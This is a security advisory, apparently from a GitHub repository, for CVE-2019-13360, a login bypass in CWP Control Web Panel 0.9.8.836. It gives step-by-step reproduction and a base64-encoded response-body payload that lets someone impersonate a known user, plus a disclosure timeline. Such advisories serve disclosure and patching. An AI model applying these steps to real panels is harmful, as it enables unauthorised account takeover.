Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Information

Product             : CWP Control Web Panel
Vulnerability Name  : User panel bypass Login
version             : 0.9.8.836
Fixed on            : 0.9.8.838
Test on             : CentOS 7.6.1810 (Core)
Reference           : http://centos-webpanel.com/
                    : https://control-webpanel.com/changelog
CVE-Number          : CVE-2019-13360

Description

By leveraging knowledge of a valid username, remoted attackers can bypass login process and become the target user


Reproduce

  1. Login as valid username and invalid password


  1. Intercept the request


  1. Release the request and intercept the response


  1. Prepare bypassing string
Bypassing format : <username>||/<username>/theme/original
Bypassing string : user1||/user1/theme/original<br>
Base64 encoding  : dXNlcjF8fC91c2VyMS90aGVtZS9vcmlnaW5hbA==


  1. Replace the result to the response body


  1. Become the target user



Timeline

2019-06-29: Discovered the bug
2019-06-29: Reported to vendor
2019-06-29: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published

Discovered by

Pongtorn Angsuchotmetee